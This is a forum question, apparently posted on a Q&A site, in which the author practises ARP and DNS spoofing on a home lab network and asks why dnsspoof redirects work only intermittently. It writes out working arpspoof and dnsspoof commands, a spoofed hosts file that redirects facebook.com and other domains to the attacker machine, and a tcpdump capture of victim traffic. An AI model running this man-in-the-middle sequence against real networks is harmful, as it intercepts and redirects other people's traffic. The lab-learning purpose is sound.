Cannot consistently demonstrate ARP Spoof and DNS Spoof?
I am trying to use arpspoof and dnsspoof to practice a man-in-the-middle attack between a couple of computers at home. Despite repeatedly following the same exact steps below, I can not get consistent results. Sometimes I am successful performing the man-in-the-middle spoof, other times I am not. At this point, my guess is that maybe there is some kind of caching with the tools I am using? Or a race condition of some kind? I have no idea and looking for feedback.
Here is my setup.
I have a wifi network called LearningMITM2. The gateway is 192.168.10.1.
I have a laptop computer with windows 10 logged into LearningMITM2 network.
On Windows command prompt, I typed ipconfig and it shows this:
...etc...
Wireless LAN adapter Wi-Fi 2:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::1f19:bef3:35b0:7e1e%8
IPv4 Address. . . . . . . . . . . : 192.168.10.100
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.10.1
...etc...
On Windows command prompt, I typed arp -a and it shows this:
...etc...
Interface: 192.168.10.100 --- 0x8
Internet Address Physical Address Type
192.168.10.1 c0-a0-bb-c7-e8-66 dynamic
192.168.10.102 08-00-27-d3-ca-32 dynamic
192.168.10.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.251 01-00-5e-00-00-fb static
224.0.0.252 01-00-5e-00-00-fc static
239.255.255.250 01-00-5e-7f-ff-fa static
255.255.255.255 ff-ff-ff-ff-ff-ff static
I have VirtualBox installed and a guest operating system of Ubuntu 22.04 installed on it. I open up a SSH Terminal connection to this ubuntu. On the Ubuntu Bash command prompt I typed ip a and it shows this:
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 08:00:27:d3:ca:32 brd ff:ff:ff:ff:ff:ff
inet 192.168.10.102/24 metric 100 brd 192.168.10.255 scope global dynamic enp0s3
valid_lft 74708sec preferred_lft 74708sec
inet6 fe80::a00:27ff:fed3:ca32/64 scope link
valid_lft forever preferred_lft forever
I open two ubuntu bash command terminal windows and type this to begin MITM:
apt-get install -y dsniff net-tools apache2;
echo 1 > /proc/sys/net/ipv4/ip_forward;
# windows 1
arpspoof -i enp0s3 -t 192.168.10.1 192.168.10.100
# gives 8:0:27:d3:ca:32 c0:a0:bb:c7:e8:66 0806 42: arp reply 192.168.10.100 is-at f8:16:54:9b:70:da
# window 2
arpspoof -i enp0s3 -t 192.168.10.100 192.168.10.1
# gives 8:0:27:d3:ca:32 f8:16:54:9b:70:da 0806 42: arp reply 192.168.10.1 is-at c0:a0:bb:c7:e8:66
From my Windows Command Prompt, I confirm that the MAC address for the gateway is something else by typing arp -a.
Interface: 192.168.10.100 --- 0x8
Internet Address Physical Address Type
192.168.10.1 08-00-27-d3-ca-32 dynamic
192.168.10.102 08-00-27-d3-ca-32 dynamic
192.168.10.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.251 01-00-5e-00-00-fb static
224.0.0.252 01-00-5e-00-00-fc static
239.255.255.250 01-00-5e-7f-ff-fa static
255.255.255.255 ff-ff-ff-ff-ff-ff static
On the ubuntu machine, I make the file mitm with this content:
demo.learning.com 192.168.10.102
192.168.10.102 demo.learning.com
Then I run the command dnsspoof -i enp0s3 -f mitm.
Then from the command prompt of my Windows machine, I type ping demo.learning.com. Sometimes the result is that ping shows it reaches 192.168.10.102. But if I repeat the exact same steps again, I might get a Ping request could not find host demo.learning.com. I get the same unpredictable behaviour when visit http://demo.learning.com from my windows web browsers after repeating the steps above, sometimes I get the default web page of the Apache server on 192.168.10.102, and other times i get a time-out.
The steps above do NOT produce consistent outcomes. I try to wait longer between commands, I tried going on lunch break, I tried restarting my computer, etc... but the outcomes are never consistent...sometimes it works, sometimes it doesn't.
What am I doing that's causing this inconsistency? What do I need to do differently to consistently and successfully perform a man-in-the-middle attack demonstration?
MORE FINDINGS
I just discovered even more interesting situations. I updated the mitm file to have these contents:
demo.learning.com 192.168.10.102
192.168.10.102 demo.learning.com
facebook.com 192.168.10.102
192.168.10.102 facebook.com
blue.com 192.168.10.102
192.168.10.102 blue.com
In other words, I added more entries. Then after following the exact steps in the original post, but using this latest mitm file for my dnsspoof command, I notice that it's completely random when and which domains will give me a ping response back from 192.168.10.102, or when it would give me the actual response from the public internet (either the actual IP in the public internet or time-out because it doesn't actually exist on the internet). For example after running the command dnsspoof -i enp0s3 -f mitm, then I might get results like this:
ping facebook.com
# gives a response from 192.168.10.102
ping demo.learning.com
# gives a time out
ping blue.com
# gives a response from 64.190.63.222
If I repeat all my steps, then I might get something like:
ping facebook.com
# gives a response from 31.13.80.36
ping demo.learning.com
# gives a response from 192.168.10.102
ping blue.com
# gives a response from 192.168.10.102
Running commands like arp -d *, ipconfig /flushdns or ip -s -s neigh flush all before each experiment does not seem to have any effect on my demonstrations.
UPDATE July 1, 2024
I noticed now that arpspoof -i enp0s3 ..etc.. consistently works 100% of the time. After the man-in-the-middle machine 192.168.10.102 runs the arpspoof command, the same machine can run a tcpdump -i enp0s3 -A tcp port 80 or tcp port 443and see the victim's traffic come through. It is only the thednsspoof` that is inconsistent. I may need to restart it a few times before it actually works.
